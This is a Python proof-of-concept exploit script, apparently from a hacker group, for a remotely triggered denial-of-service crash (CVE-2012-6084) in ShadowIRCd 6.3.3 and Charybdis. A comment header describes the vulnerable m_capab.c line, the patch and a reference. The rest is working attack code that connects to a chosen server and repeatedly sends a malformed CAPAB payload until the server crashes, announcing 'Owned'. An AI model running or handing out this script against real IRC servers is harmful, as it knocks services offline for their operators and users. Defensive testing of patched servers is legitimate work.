#!/usr/bin/python3
###################################################################################
#
#      _  _  .__                .__               
#   __| || |_|  |   ____   ____ |__| ____   ____  
#   \   __   /  | _/ __ \ / ___\|  |/  _ \ /    \ 
#    |  ||  ||  |_\  ___// /_/  >  (  <_> )   |  \        http://www.zempirians.com
#   /_  ~~  _\____/\___  >___  /|__|\____/|___|  /
#     |_||_|           \/_____/                \/
#
#   00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
#   Provided by: UberLame, Aph3x, Apetrick, O_O
#
###################################################################################
#
#             -=[ SHADOWIRCD 6.3.3 - Running vulnerable m_capab.c ] =-
#
#         [P]roof [o]f [C]oncept, Null Point Reference, Denial of Service
#
#
###################################################################################
# -=[ EXPLOIT ]=-
#
# Now that a patch has been secured we are releasing a proof of concept to test your
# ircd against this vulnerability. This exploit was designed to work against
# Shadowircd 6.3.3 running the following vulnerable code:
#
#	+VULNERABLE+
#       ../shadowircd/modules/m_capab.c - LINE(40)
#	{{mr_capab, 0}, mg_ignore, mg_ignore, mg_ignore, mg_ignore, mg_ignore}
#
# -=[ SUMMARY ]=-
#
# All versions of Charybdis are vulnerable to a remotely-triggered crash bug
# caused by code originating from ircd-ratbox 2.0.  (Incidentally, this means all
# versions since ircd-ratbox 2.0 are also vulnerable.)
# 
# The bug has to do with server capability negotiation.  A malformed request will
# trigger a crash due to invalid assumptions.
#
# -=[ PATCH ]=-
#
# January 1, 2013 - 12:55 PM GMT-6
# 
# Charybdis 3.4.2, ShadowIRCd 6.3.3 and Ratbox 3.0.8 have been released with an
# integrated patch to resolve this issue.  All admins should upgrade immediately.
#
# -=[ REFERENCE ]=-
#
# http://www.cvedetails.com/cve/CVE-2012-6084/
#
###################################################################################
# Ohai, I Can Has Moar Cycles? <33
#
# Eg: ./<file>.py -t <target> -p <port>
###################################################################################

from argparse import ArgumentParser
import socket


def own( uri, port ):
        sock = socket.socket()
        try:
                ret = sock.connect_ex(( uri, int( port ) ))
        except:
                print( "\t[-] Failed To Connect To {}".format( uri ) )
                exit()

        print( "\t[+] Connected, Sending Payload To {}:{}".format(  uri, port ) )
        while True:
                try:
                        sock.send(b"\x43\x41\x50\x41\x42\x20\x0d\x0a")
                except socket.error as se:
                        print( '\t[!] Owned <3' )
                        break

        sock.close()

if __name__ == '__main__':
        parser = ArgumentParser( description='m_capab DOS PoC, We Can Has Moar Cycles?' )

        parser.add_argument( '-t', '--target', dest='target', default='localhost', help='IRCD Address To Target' )
        parser.add_argument( '-p', '--port', dest='port', default=6667, help='IRCD Port To Target' )

        args = parser.parse_args()

        own( args.target, args.port )